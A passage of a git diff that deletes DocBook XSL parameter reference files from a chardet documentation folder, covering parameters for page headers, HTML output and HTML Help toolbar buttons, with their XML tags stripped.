@@ - - -glossterm.width -length - - -glossterm.width -Width of glossterm in list presentation mode - - - - - - - - -Description - -This parameter specifies the width reserved for glossary terms when -a list presentation is used. - - - diff --git a/chardet/docs/docbook/xsl/params/graphic.default.extension.xml b/chardet/docs/docbook/xsl/params/graphic.default.extension.xml deleted file mode 100644 index 58d763c..0000000 --- a/chardet/docs/docbook/xsl/params/graphic.default.extension.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -graphic.default.extension -string - - -graphic.default.extension -Default extension for graphic filenames - - - - - - -Description - -If a graphic or mediaobject -includes a reference to a filename that does not include an extension, -and the format attribute is -unspecified, the default extension will be used. - - - - diff --git a/chardet/docs/docbook/xsl/params/graphicsize.extension.xml b/chardet/docs/docbook/xsl/params/graphicsize.extension.xml deleted file mode 100644 index e8cacff..0000000 --- a/chardet/docs/docbook/xsl/params/graphicsize.extension.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -graphicsize.extension -boolean - - -graphicsize.extension -Enable the getWidth()/getDepth() extension functions - - - - - - - - -Description - -If non-zero (and if use.extensions is non-zero -and if you're using a processor that supports extension functions), the -getWidth and getDepth functions -will be used to extract image sizes from graphics. - - - diff --git a/chardet/docs/docbook/xsl/params/header.column.widths.xml b/chardet/docs/docbook/xsl/params/header.column.widths.xml deleted file mode 100644 index f88dc6f..0000000 --- a/chardet/docs/docbook/xsl/params/header.column.widths.xml +++ /dev/null @@ -1,69 +0,0 @@ - - -header.column.widths -string - - -header.column.widths -Specify relative widths of header areas - - - - - - -Description - -Page headers in print output use a three column table -to position text at the left, center, and right side of -the header on the page. -This parameter lets you specify the relative sizes of the -three columns. The default value is -"1 1 1". - -The parameter value must be three numbers, separated -by white space. The first number represents the relative -width of the left header for -single-sided output, or the inside header for -double-sided output. The second number is the relative -width of the center header. The third number is the -relative width of the right header for -single-sided output, or the outside header for -double-sided output. - - -The numbers are used to specify the column widths -for the table that makes up the header area. -In the FO output, this looks like: - - - -<fo:table-column column-number="1" - column-width="proportional-column-width(1)"/> - - - -The proportional-column-width() -function computes a column width by dividing its -argument by the total of the arguments for all the columns, and -then multiplying the result by the width of the whole table -(assuming all the column specs use the function). -Its argument can be any positive integer or floating point number. -Zero is an acceptable value, although some FO processors -may warn about it, in which case using a very small number might -be more satisfactory. - - -For example, the value "1 2 1" means the center -header should have twice the width of the other areas. -A value of "0 0 1" means the entire header area -is reserved for the right (or outside) header text. -Note that to keep the center area centered on -the page, the left and right values must be -the same. A specification like "1 2 3" means the -center area is no longer centered on the page -since the right area is three times the width of the left area. - - - - diff --git a/chardet/docs/docbook/xsl/params/header.content.properties.xml b/chardet/docs/docbook/xsl/params/header.content.properties.xml deleted file mode 100644 index 7ba0986..0000000 --- a/chardet/docs/docbook/xsl/params/header.content.properties.xml +++ /dev/null @@ -1,29 +0,0 @@ - - -header.content.properties - - - -header.content.properties - - - - - - - - - - - - - - - - -Description - -Properties of page header content. - - - diff --git a/chardet/docs/docbook/xsl/params/header.rule.xml b/chardet/docs/docbook/xsl/params/header.rule.xml deleted file mode 100644 index 0455f1a..0000000 --- a/chardet/docs/docbook/xsl/params/header.rule.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -header.rule -boolean - - -header.rule -Rule under headers? - - - - - - - - -Description - -If non-zero, a rule will be drawn below the page headers. - - - diff --git a/chardet/docs/docbook/xsl/params/headers.on.blank.pages.xml b/chardet/docs/docbook/xsl/params/headers.on.blank.pages.xml deleted file mode 100644 index ba8fb0f..0000000 --- a/chardet/docs/docbook/xsl/params/headers.on.blank.pages.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -headers.on.blank.pages -boolean - - -headers.on.blank.pages -Put headers on blank pages? - - - - - - - - -Description - -If non-zero, headers will be placed on blank pages. - - - diff --git a/chardet/docs/docbook/xsl/params/html.base.xml b/chardet/docs/docbook/xsl/params/html.base.xml deleted file mode 100644 index 0398894..0000000 --- a/chardet/docs/docbook/xsl/params/html.base.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -html.base -uri - - -html.base -An HTML base URI - - - - - - -Description - -If html.base is set, it is used for the BASE -element in the HEAD of the HTML documents. -This is useful for dynamically served HTML where the base URI needs -to be shifted. - - - diff --git a/chardet/docs/docbook/xsl/params/html.cellpadding.xml b/chardet/docs/docbook/xsl/params/html.cellpadding.xml deleted file mode 100644 index 0180a13..0000000 --- a/chardet/docs/docbook/xsl/params/html.cellpadding.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -html.cellpadding -integer - - -html.cellpadding -Default value for cellpadding in HTML tables - - - - - - - - -Description - -If specified, this value will be used as the default cellpadding value -in HTML tables. - - - diff --git a/chardet/docs/docbook/xsl/params/html.cellspacing.xml b/chardet/docs/docbook/xsl/params/html.cellspacing.xml deleted file mode 100644 index 10fbe01..0000000 --- a/chardet/docs/docbook/xsl/params/html.cellspacing.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -html.cellspacing -integer - - -html.cellspacing -Default value for cellspacing in HTML tables - - - - - - - - -Description - -If specified, this value will be used as the default cellspacing value -in HTML tables. - - - diff --git a/chardet/docs/docbook/xsl/params/html.cleanup.xml b/chardet/docs/docbook/xsl/params/html.cleanup.xml deleted file mode 100644 index 43fa6b4..0000000 --- a/chardet/docs/docbook/xsl/params/html.cleanup.xml +++ /dev/null @@ -1,29 +0,0 @@ - - -html.cleanup -boolean - - -html.cleanup -Attempt to clean up the resulting HTML? - - - - - - - - -Description - -If non-zero, and if the EXSLT -extensions are supported by your processor, the resulting HTML will be -cleaned up. This improves the chances that the -resulting HTML will be valid. It may also improve the formatting of -some elements. - -This parameter is different from make.valid.html -because it uses extension functions to manipulate result-tree-fragments. - - - diff --git a/chardet/docs/docbook/xsl/params/html.ext.xml b/chardet/docs/docbook/xsl/params/html.ext.xml deleted file mode 100644 index dd20205..0000000 --- a/chardet/docs/docbook/xsl/params/html.ext.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -html.ext - - - -html.ext -Identifies the extension of generated HTML files - - - - - - - - -Description - -The extension identified by html.ext will -be used as the filename extension for chunks created by this stylesheet. - - - - diff --git a/chardet/docs/docbook/xsl/params/html.extra.head.links.xml b/chardet/docs/docbook/xsl/params/html.extra.head.links.xml deleted file mode 100644 index 5680e59..0000000 --- a/chardet/docs/docbook/xsl/params/html.extra.head.links.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -html.extra.head.links -boolean - - -html.extra.head.links -Toggle extra HTML head link information - - - - - - - - -Description - -If non-zero, extra link elements will be -generated in the head of chunked HTML files. These -extra links point to chapters, appendixes, sections, etc. as supported -by the Site Navigation Bar in Mozilla 1.0 (as of CR1, at least). - - - - diff --git a/chardet/docs/docbook/xsl/params/html.longdesc.link.xml b/chardet/docs/docbook/xsl/params/html.longdesc.link.xml deleted file mode 100644 index a3406f2..0000000 --- a/chardet/docs/docbook/xsl/params/html.longdesc.link.xml +++ /dev/null @@ -1,29 +0,0 @@ - - -html.longdesc.link -boolean - - -html.longdesc.link -Should a link to the longdesc be included in the HTML? - - - - - - - - -Description - -If non-zero, links will be created to the -HTML files created for the -longdesc attribute. It makes no -sense to turn enable this option without also enabling the -$html.longdesc parameter. - -The longdesc.link named template is called -to construct the link. - - - diff --git a/chardet/docs/docbook/xsl/params/html.longdesc.xml b/chardet/docs/docbook/xsl/params/html.longdesc.xml deleted file mode 100644 index 1098b69..0000000 --- a/chardet/docs/docbook/xsl/params/html.longdesc.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -html.longdesc -boolean - - -html.longdesc -Should longdesc URIs be created? - - - - - - - - -Description - -If non-zero, HTML files will be created for the -longdesc attribute. These files -are created from the textobjects in -mediaobjects and -inlinemediaobject. - - - - diff --git a/chardet/docs/docbook/xsl/params/html.stylesheet.type.xml b/chardet/docs/docbook/xsl/params/html.stylesheet.type.xml deleted file mode 100644 index 8cea763..0000000 --- a/chardet/docs/docbook/xsl/params/html.stylesheet.type.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -html.stylesheet.type -string - - -html.stylesheet.type -The type of the stylesheet used in the generated HTML - - - -text/css - - -Description - -The type of the stylesheet to place in the HTML link tag. - - - - diff --git a/chardet/docs/docbook/xsl/params/html.stylesheet.xml b/chardet/docs/docbook/xsl/params/html.stylesheet.xml deleted file mode 100644 index d78332f..0000000 --- a/chardet/docs/docbook/xsl/params/html.stylesheet.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -html.stylesheet -string - - -html.stylesheet -Name of the stylesheet(s) to use in the generated HTML - - - - - - - - -Description - -The html.stylesheet parameter is either empty, -indicating that no stylesheet LINK tag should be generated -in the HTML output, or it is a list of one or more stylesheets. - -Multiple stylesheets are space-delimited. If you need to -reference a stylesheet URI that includes a space, encode it with -%20. A seprate HTML LINK element will -be generated for each stylesheet in the order they are listed in the -parameter. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.alias.file.xml b/chardet/docs/docbook/xsl/params/htmlhelp.alias.file.xml deleted file mode 100644 index ff67d1c..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.alias.file.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.alias.file -string - - -htmlhelp.alias.file -Filename of map file. - - - - - - - - -Description - -Change this parameter if you want different name of map file -than alias.h. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.autolabel.xml b/chardet/docs/docbook/xsl/params/htmlhelp.autolabel.xml deleted file mode 100644 index 25c65cb..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.autolabel.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.autolabel -boolean - - -htmlhelp.autolabel -Should tree-like ToC use autonumbering feature? - - - - - - - - -Description - -If you want to include chapter and section numbers into ToC in -the left panel, set this parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.back.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.back.xml deleted file mode 100644 index 99f2dc6..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.back.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.back -boolean - - -htmlhelp.button.back -Should be Back button shown? - - - - - - - - -Description - -If you want Back button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.forward.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.forward.xml deleted file mode 100644 index c4e699a..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.forward.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.forward -boolean - - -htmlhelp.button.forward -Should be Forward button shown? - - - - - - - - -Description - -If you want Forward button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.hideshow.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.hideshow.xml deleted file mode 100644 index 118d375..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.hideshow.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.hideshow -boolean - - -htmlhelp.button.hideshow -Should be Hide/Show button shown? - - - - - - - - -Description - -If you want Hide/Show button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.home.url.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.home.url.xml deleted file mode 100644 index 5d19ff7..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.home.url.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -htmlhelp.button.home.url -string - - -htmlhelp.button.home.url -URL address of page accessible by Home button - - - - - - - - -Description - -URL address of page accessible by Home button. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.home.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.home.xml deleted file mode 100644 index ab7c6f2..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.home.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.home -boolean - - -htmlhelp.button.home -Should be Home button shown? - - - - - - - - -Description - -If you want Home button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.title.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.title.xml deleted file mode 100644 index ddcc65c..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.title.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -htmlhelp.button.jump1.title -string - - -htmlhelp.button.jump1.title -Title of Jump1 button - - - - - - - - -Description - -Title of Jump1 button. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.url.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.url.xml deleted file mode 100644 index f800538..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.url.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -htmlhelp.button.jump1.url -string - - -htmlhelp.button.jump1.url -URL address of page accessible by Jump1 button - - - - - - - - -Description - -URL address of page accessible by Jump1 button. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.xml deleted file mode 100644 index a578dd6..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump1.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.jump1 -boolean - - -htmlhelp.button.jump1 -Should be Jump1 button shown? - - - - - - - - -Description - -If you want Jump1 button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.title.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.title.xml deleted file mode 100644 index 05a1c29..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.title.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -htmlhelp.button.jump2.title -string - - -htmlhelp.button.jump2.title -Title of Jump2 button - - - - - - - - -Description - -Title of Jump2 button. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.url.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.url.xml deleted file mode 100644 index 492b52b..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.url.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -htmlhelp.button.jump2.url -string - - -htmlhelp.button.jump2.url -URL address of page accessible by Jump2 button - - - - - - - - -Description - -URL address of page accessible by Jump2 button. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.xml deleted file mode 100644 index 3d89acf..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.jump2.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.jump2 -boolean - - -htmlhelp.button.jump2 -Should be Jump2 button shown? - - - - - - - - -Description - -If you want Jump2 button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.locate.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.locate.xml deleted file mode 100644 index ffa89cd..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.locate.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.locate -boolean - - -htmlhelp.button.locate -Should be Locate button shown? - - - - - - - - -Description - -If you want Locate button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.next.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.next.xml deleted file mode 100644 index aa7552d..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.next.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.next -boolean - - -htmlhelp.button.next -Should be Next button shown? - - - - - - - - -Description - -If you want Next button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.options.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.options.xml deleted file mode 100644 index 70ca16b..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.options.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.options -boolean - - -htmlhelp.button.options -Should be Options button shown? - - - - - - - - -Description - -If you want Options button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.prev.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.prev.xml deleted file mode 100644 index f47a78a..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.prev.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.prev -boolean - - -htmlhelp.button.prev -Should be Prev button shown? - - - - - - - - -Description - -If you want Prev button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.print.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.print.xml deleted file mode 100644 index 58eb7cf..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.print.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.print -boolean - - -htmlhelp.button.print -Should be Print button shown? - - - - - - - - -Description - -If you want Print button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.refresh.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.refresh.xml deleted file mode 100644 index 9a9e140..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.refresh.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.refresh -boolean - - -htmlhelp.button.refresh -Should be Refresh button shown? - - - - - - - - -Description - -If you want Refresh button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.stop.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.stop.xml deleted file mode 100644 index 5b88acb..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.stop.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.stop -boolean - - -htmlhelp.button.stop -Should be Stop button shown? - - - - - - - - -Description - -If you want Stop button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.button.zoom.xml b/chardet/docs/docbook/xsl/params/htmlhelp.button.zoom.xml deleted file mode 100644 index f6e4a18..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.button.zoom.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.button.zoom -boolean - - -htmlhelp.button.zoom -Should be Zoom button shown? - - - - - - - - -Description - -If you want Zoom button shown on toolbar, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.chm.xml b/chardet/docs/docbook/xsl/params/htmlhelp.chm.xml deleted file mode 100644 index 7d571e3..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.chm.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.chm -string - - -htmlhelp.chm -Filename of output HTML Help file. - - - - - - - - -Description - -Change this parameter if you want different name of result -CHM file than htmlhelp.chm. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.default.topic.xml b/chardet/docs/docbook/xsl/params/htmlhelp.default.topic.xml deleted file mode 100644 index 9350d7b..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.default.topic.xml +++ /dev/null @@ -1,31 +0,0 @@ - - -htmlhelp.default.topic -string - - -htmlhelp.default.topic -Name of file with default topic - - - - - - - - -Description - -Normally first chunk of document is displayed when you open HTML -Help file. If you want to display another topic, simply set its -filename by this parameter. - -This is useful especially if you don't generate ToC in front of -your document and you also hide root element in ToC. E.g.: - - - -]]> - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.display.progress.xml b/chardet/docs/docbook/xsl/params/htmlhelp.display.progress.xml deleted file mode 100644 index 5902153..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.display.progress.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.display.progress -boolean - - -htmlhelp.display.progress -Display compile progress? - - - - - - - - -Description - -You can swith off display of compile progress by setting this -parameter to 0. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.encoding.xml b/chardet/docs/docbook/xsl/params/htmlhelp.encoding.xml deleted file mode 100644 index f7c04b5..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.encoding.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.encoding -string - - -htmlhelp.encoding -Character encoding to use in files for HTML Help compiler. - - - - - - - - -Description - -HTML Help Compiler is not UTF-8 aware, so you should always use -apropriate single-byte encoding here. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.enhanced.decompilation.xml b/chardet/docs/docbook/xsl/params/htmlhelp.enhanced.decompilation.xml deleted file mode 100644 index f5c5968..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.enhanced.decompilation.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -htmlhelp.enhanced.decompilation -boolean - - -htmlhelp.enhanced.decompilation -Allow enhanced decompilation of CHM? - - - - - - - - -Description - -When set to 1 this parameter enables enhanced decompilation of CHM. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.enumerate.images.xml b/chardet/docs/docbook/xsl/params/htmlhelp.enumerate.images.xml deleted file mode 100644 index 723dbda..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.enumerate.images.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.enumerate.images -boolean - - -htmlhelp.enumerate.images -Should be paths to all used images added to project file? - - - - - - - - -Description - -You should turn on this flag, if you insert images into your documents -as external binary entities or if you are using absolute path in image names. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.force.map.and.alias.xml b/chardet/docs/docbook/xsl/params/htmlhelp.force.map.and.alias.xml deleted file mode 100644 index 92a9e69..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.force.map.and.alias.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -htmlhelp.force.map.and.alias -boolean - - -htmlhelp.force.map.and.alias -Should be [MAP] and [ALIAS] section added to project file unconditionaly? - - - - - - - - -Description - -You should turn on this flag, if you have your own -alias.h and contex.h files -and you want include reference to them in project file. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.binary.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhc.binary.xml deleted file mode 100644 index f4f2e15..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.binary.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -htmlhelp.hhc.binary - - - -htmlhelp.hhc.binary - - - - - - - - - -Description - -This parametr controls whether binary TOC will be generated. You -must create binary TOC if you want to add Prev/Next buttons to toolbar -(which is default behaviour). Files with binary TOC can't be merged. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.folders.instead.books.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhc.folders.instead.books.xml deleted file mode 100644 index 963cb9e..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.folders.instead.books.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -htmlhelp.hhc.folders.instead.books - - - -htmlhelp.hhc.folders.instead.books - - - - - - - - - -Description - -This parameter controls whether there should be folder-like -icons (1) or book-like icons (0) in ToC. If you want to use -folder-like icons you must swith off binary ToC using -htmlhelp.hhc.binary. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.section.depth.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhc.section.depth.xml deleted file mode 100644 index b00f4d8..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.section.depth.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.hhc.section.depth -integer - - -htmlhelp.hhc.section.depth -Depth of TOC for sections in a left pane. - - - - - - - - -Description - -Change this parameter if you want shallower ToC in a left pane -of HTML Help viewer. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.show.root.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhc.show.root.xml deleted file mode 100644 index 3d4a5b4..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.show.root.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -htmlhelp.hhc.show.root -boolean - - -htmlhelp.hhc.show.root -Should be entry for root element shown in ToC? - - - - - - - - -Description - -If set to 0, there will be no entry for root element in -ToC. This is useful when you want provide user with expanded ToC as -a default. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.width.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhc.width.xml deleted file mode 100644 index eaf0f99..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.width.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -htmlhelp.hhc.width -integer - - -htmlhelp.hhc.width -Width of navigation (ToC) pane - - - - - - - - -Description - -This parameter specifies width of ToC pane in pixels. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhc.xml deleted file mode 100644 index dadb0a6..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhc.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.hhc -string - - -htmlhelp.hhc -Filename of TOC file. - - - - - - - - -Description - -Change this parameter if you want different name of TOC file -than toc.hhc. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhk.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhk.xml deleted file mode 100644 index 49506a8..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhk.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.hhk -string - - -htmlhelp.hhk -Filename of index file. - - - - - - - - -Description - -Change this parameter if you want different name of index file -than index.hhk. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhp.tail.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhp.tail.xml deleted file mode 100644 index 0792bbb..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhp.tail.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.hhp.tail -string - - -htmlhelp.hhp.tail -Additional content for project file. - - - - - - - - -Description - -If you want to include some additional parameters into project file, -store appropriate part of project file into this parameter. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhp.window.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhp.window.xml deleted file mode 100644 index 7ba5296..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhp.window.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.hhp.window -string - - -htmlhelp.hhp.window -Name of default window. - - - - - - - - -Description - -Name of default window. If empty no [WINDOWS] section will be -added to project file. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhp.windows.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhp.windows.xml deleted file mode 100644 index f4df44a..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhp.windows.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -htmlhelp.hhp.windows -string - - -htmlhelp.hhp.windows -Definition of additional windows - - - - - - - - -Description - -Content of this parameter is placed at the end of [WINDOWS] -section of project file. You can use it for defining your own -addtional windows. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.hhp.xml b/chardet/docs/docbook/xsl/params/htmlhelp.hhp.xml deleted file mode 100644 index 4058f0a..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.hhp.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.hhp -string - - -htmlhelp.hhp -Filename of project file. - - - - - - - - -Description - -Change this parameter if you want different name of project -file than htmlhelp.hhp. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.map.file.xml b/chardet/docs/docbook/xsl/params/htmlhelp.map.file.xml deleted file mode 100644 index 49ee9cb..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.map.file.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.map.file -string - - -htmlhelp.map.file -Filename of map file. - - - - - - - - -Description - -Change this parameter if you want different name of map file -than context.h. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.only.xml b/chardet/docs/docbook/xsl/params/htmlhelp.only.xml deleted file mode 100644 index 17755df..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.only.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -htmlhelp.only -boolean - - -htmlhelp.only -Should be only project files generated? - - - - - - - - -Description - -If you want to play with various HTML Help parameters and you -don't need to regenerate all HTML files, you can set this parameter to -1. This setting will not process whole document, only project files -(hhp, hhc, hhk,...) will be generated. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.remember.window.position.xml b/chardet/docs/docbook/xsl/params/htmlhelp.remember.window.position.xml deleted file mode 100644 index bd2123a..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.remember.window.position.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.remember.window.position -boolean - - -htmlhelp.remember.window.position -Remember help window position? - - - - - - - - -Description - -To remember help window position between starts set this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.show.advanced.search.xml b/chardet/docs/docbook/xsl/params/htmlhelp.show.advanced.search.xml deleted file mode 100644 index 85e4c4d..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.show.advanced.search.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.show.advanced.search -boolean - - -htmlhelp.show.advanced.search -Should be advanced search available? - - - - - - - - -Description - -If you want advanced search features in your help, turn this -parameter to 1. - - - diff --git 